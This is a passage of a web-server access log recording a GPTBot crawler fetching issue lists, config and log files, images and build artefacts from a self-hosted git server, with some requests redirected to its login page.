"/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10069] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:18:37:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-1.conf?display=rendered" [Client 74.7.227.38] [Length 11223] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-1.conf" +[17/Feb/2026:18:37:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-4.conf?display=rendered" [Client 74.7.227.38] [Length 11220] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-4.conf" +[17/Feb/2026:18:37:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-7.conf?display=rendered" [Client 74.7.227.38] [Length 11222] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-7.conf" +[17/Feb/2026:18:37:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-2.conf?display=rendered" [Client 74.7.227.38] [Length 11215] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-2.conf" +[17/Feb/2026:18:37:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-6.conf?display=rendered" [Client 74.7.227.38] [Length 11219] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-6.conf" +[17/Feb/2026:18:37:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83?files=PostgresMonitor%2fdist%2fPostgresWatchdog.exe" [Client 74.7.227.38] [Length 17050] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/dist/PostgresWatchdog.exe" +[17/Feb/2026:18:37:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 9986] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=mostcomment&state=open&type=all" +[17/Feb/2026:18:37:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10176] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=farduedate&state=open&type=all" +[17/Feb/2026:18:37:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10001] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?project=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:18:37:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9999] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?project=-1&sort=farduedate&state=all&type=all" +[17/Feb/2026:18:37:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10167] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?project=-1&sort=farduedate&state=all&type=all" +[17/Feb/2026:18:37:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10001] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?project=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:18:37:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10004] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?project=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:18:37:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9996] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?project=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:18:37:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11638] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:18:37:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 9979] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&sort=oldest&state=all&type=all" +[17/Feb/2026:18:37:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10205] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&sort=latest&state=all&type=all" +[17/Feb/2026:18:37:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10017] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&sort=latest&state=all&type=all" +[17/Feb/2026:18:37:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10182] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=leastcomment&state=open&type=all" +[17/Feb/2026:18:37:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-1_access.log?display=rendered" [Client 74.7.227.38] [Length 11185] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-1_access.log" +[17/Feb/2026:18:37:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp?display=rendered" [Client 74.7.227.38] [Length 11084] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" +[17/Feb/2026:18:37:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-4_access.log?display=rendered" [Client 74.7.227.38] [Length 11184] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-4_access.log" +[17/Feb/2026:18:37:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-3_access.log?display=rendered" [Client 74.7.227.38] [Length 11185] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-3_access.log" +[17/Feb/2026:18:37:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp?display=rendered" [Client 74.7.227.38] [Length 11084] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" +[17/Feb/2026:18:37:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-2_access.log?display=rendered" [Client 74.7.227.38] [Length 11184] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-2_access.log" +[17/Feb/2026:18:37:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10219] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=oldest&state=closed&type=all" +[17/Feb/2026:18:37:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs" [Client 74.7.227.38] [Length 10596] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3" +[17/Feb/2026:18:37:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs" [Client 74.7.227.38] [Length 10594] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2" +[17/Feb/2026:18:37:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs" [Client 74.7.227.38] [Length 10596] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1" +[17/Feb/2026:18:37:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom4.png?display=rendered" [Client 74.7.227.38] [Length 11062] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom4.png" +[17/Feb/2026:18:37:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom6.png?display=rendered" [Client 74.7.227.38] [Length 11063] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom6.png" +[17/Feb/2026:18:37:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom3.png?display=rendered" [Client 74.7.227.38] [Length 11063] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom3.png" +[17/Feb/2026:18:37:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom7.png?display=rendered" [Client 74.7.227.38] [Length 11068] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom7.png" +[17/Feb/2026:18:37:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom5.png?display=rendered" [Client 74.7.227.38] [Length 11059] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom5.png" +[17/Feb/2026:18:37:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom1.png?display=rendered" [Client 74.7.227.38] [Length 11062] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom1.png" +[17/Feb/2026:18:37:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom2.png?display=rendered" [Client 74.7.227.38] [Length 11062] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom2.png" +[17/Feb/2026:18:37:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10034] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=latest&state=closed&type=all" +[17/Feb/2026:18:37:44 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs" +[17/Feb/2026:18:37:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs" +[17/Feb/2026:18:37:45 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs" +[17/Feb/2026:18:37:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs" +[17/Feb/2026:18:37:45 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs" +[17/Feb/2026:18:37:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs" +[17/Feb/2026:18:37:46 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs" +[17/Feb/2026:18:37:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs" +[17/Feb/2026:18:37:46 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs" +[17/Feb/2026:18:37:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs" +[17/Feb/2026:18:37:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs" +[17/Feb/2026:18:37:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs" +[17/Feb/2026:18:37:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs" +[17/Feb/2026:18:37:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs" +[17/Feb/2026:18:37:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs" +[17/Feb/2026:18:37:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs" +[17/Feb/2026:18:37:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs" +[17/Feb/2026:18:37:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs" +[17/Feb/2026:18:37:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 11154] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs" +[17/Feb/2026:18:37:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 11155] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs" +[17/Feb/2026:18:37:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 11155] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs" +[17/Feb/2026:18:37:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 11156] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 